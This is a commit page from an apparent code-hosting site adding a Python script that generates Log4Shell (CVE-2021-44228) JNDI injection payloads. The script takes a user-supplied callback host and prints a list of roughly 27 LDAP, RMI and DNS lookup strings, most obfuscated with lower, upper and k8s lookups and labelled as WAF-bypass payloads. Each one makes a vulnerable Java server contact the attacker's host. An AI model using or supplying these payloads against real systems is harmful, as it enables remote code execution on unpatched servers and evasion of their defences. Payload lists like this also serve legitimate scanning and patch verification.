crash.software
Projects
Pull Requests
Issues
Builds
ticofookfook
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY ticofookfook Commits 0a2a0e84
🤬
  • ■ ■ ■ ■ ■ ■
    Log4j/log4j_payload_generater.py
     1 +#!/usr/bin/env python3
     2 +# coding=utf-8
     3 +# ******************************************************************
     4 +# log4j-paylaod generator: A generic payload generator for Apache log4j RCE CVE-2021-44228
     5 +# Author:
     6 +# Yesspider (Y3$_$pider)
     7 +#
     8 +# ******************************************************************
     9 + 
     10 + 
     11 +import colorama
     12 +from colorama import Fore, Back, Style
     13 +colorama.init(autoreset=True)
     14 + 
     15 + 
     16 + 
     17 +callback_host = str(input('[+] Enter callback_host [localhost:1389] : '))
     18 +#user input to replace callback_host
     19 + 
     20 +random = str(input('[+] Enter random_string [yesspider] : '))
     21 +#user input to replace random_string
     22 + 
     23 +payload_list = ["${jndi:ldap://{{callback_host}}/{{random}}}",
     24 + "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{callback_host}}/{{random}}}",
     25 + "${${::-j}ndi:rmi://{{callback_host}}/{{random}}}",
     26 + "${jndi:rmi://{{callback_host}}/{{random}}}",
     27 + "${jndi:rmi://{{callback_host}}}/",
     28 + "${${lower:jndi}:${lower:rmi}://{{callback_host}}/{{random}}}",
     29 + "${${lower:${lower:jndi}}:${lower:rmi}://{{callback_host}}/{{random}}}",
     30 + "${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{callback_host}}/{{random}}}",
     31 + "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{{callback_host}}/{{random}}}",
     32 + "${jndi:dns://{{callback_host}}/{{random}}}",
     33 + "${jnd${123%25ff:-${123%25ff:-i:}}ldap://{{callback_host}}/{{random}}}",
     34 + "${jndi:dns://{{callback_host}}}",
     35 + "${j${k8s:k5:-ND}i:ldap://{{callback_host}}/{{random}}}",
     36 + "${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//{{callback_host}}/{{random}}}",
     37 + "${j${k8s:k5:-ND}i${sd:k5:-:}ldap://{{callback_host}}/{{random}}}",
     38 + "${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//{{callback_host}}/{{random}}}",
     39 + "${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://{{callback_host}}/{{random}}}",
     40 + "${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//{{callback_host}}/{{random}}}",
     41 + "${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//{{callback_host}}/{{random}}}",
     42 + "${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//{{callback_host}}/{{random}}",
     43 + "${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//{{callback_host}}/{{random}}}",
     44 + "${jndi:${lower:l}${lower:d}a${lower:p}://{{callback_host}}}",
     45 + "${jnd${upper:i}:ldap://{{callback_host}}/{{random}}}",
     46 + "${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://{{callback_host}}/{{random}}}",
     47 + "${jndi:ldap://127.0.0.1#{{callback_host}}:1389/{{random}}}",
     48 + "${jndi:ldap://127.0.0.1#{{callback_host}}/{{random}}}",
     49 + "${jndi:ldap://127.1.1.1#{{callback_host}}/{{random}}}"]
     50 + 
     51 + 
     52 +# logo , auther_name and tool discription
     53 + 
     54 +print ()
     55 + 
     56 +print (f"{Fore.CYAN}******************************************************************")
     57 +print ("log4j-paylaod generator: A payload generator for Apache log4j RCE CVE-2021-44228")
     58 +print ('\033[31m' + "Author:")
     59 +print ("Yesspider")
     60 +print ("")
     61 +print(f"{Fore.YELLOW} __ __ __ __ ")
     62 +print(f"{Fore.YELLOW}/ \ / | / | / | ")
     63 +print(f"{Fore.YELLOW}$$ \ /$$/______ _______ _______ ______ $$/ ____$$ | ______ ______ ")
     64 +print(f"{Fore.YELLOW} $$ \/$$// \ / | / | / \ / | / $$ | / \ / \ ")
     65 +print(f"{Fore.YELLOW} $$ $$//$$$$$$ |/$$$$$$$/ /$$$$$$$/ /$$$$$$ |$$ |/$$$$$$$ |/$$$$$$ |/$$$$$$ |")
     66 +print(f"{Fore.YELLOW} $$$$/ $$ $$ |$$ \ $$ \ $$ | $$ |$$ |$$ | $$ |$$ $$ |$$ | $$/ ")
     67 +print(f"{Fore.YELLOW} $$ | $$$$$$$$/ $$$$$$ | $$$$$$ |$$ |__$$ |$$ |$$ \__$$ |$$$$$$$$/ $$ | ")
     68 +print(f"{Fore.YELLOW} $$ | $$ |/ $$/ / $$/ $$ $$/ $$ |$$ $$ |$$ |$$ | ")
     69 +print(f"{Fore.YELLOW} $$/ $$$$$$$/ $$$$$$$/ $$$$$$$/ $$$$$$$/ $$/ $$$$$$$/ $$$$$$$/ $$/ ")
     70 +print(f"{Fore.YELLOW} $$ | ")
     71 +print(f"{Fore.YELLOW} $$ | ")
     72 +print(f"{Fore.YELLOW} $$/ ")
     73 +print (f"{Fore.CYAN}******************************************************************")
     74 + 
     75 +print ()
     76 + 
     77 +print (f"{Fore.CYAN}Callback_Host = ", callback_host)
     78 +print (f"{Fore.CYAN}Random_String = ", random)
     79 + 
     80 +print ()
     81 +print ('\033[31m' + "log4j_WAF_bypass_payloads... ")
     82 +print ()
     83 + 
     84 + 
     85 + 
     86 + 
     87 +#replace host and random string
     88 + 
     89 +for i in payload_list:
     90 + new_payload = i.replace("{{callback_host}}", callback_host);
     91 + new_payload = new_payload.replace("{{random}}", random);
     92 + # print the final paylaod list
     93 + print (new_payload)
     94 + 
     95 +print ()
     96 + 
Please wait...
Page is in error, reload to recover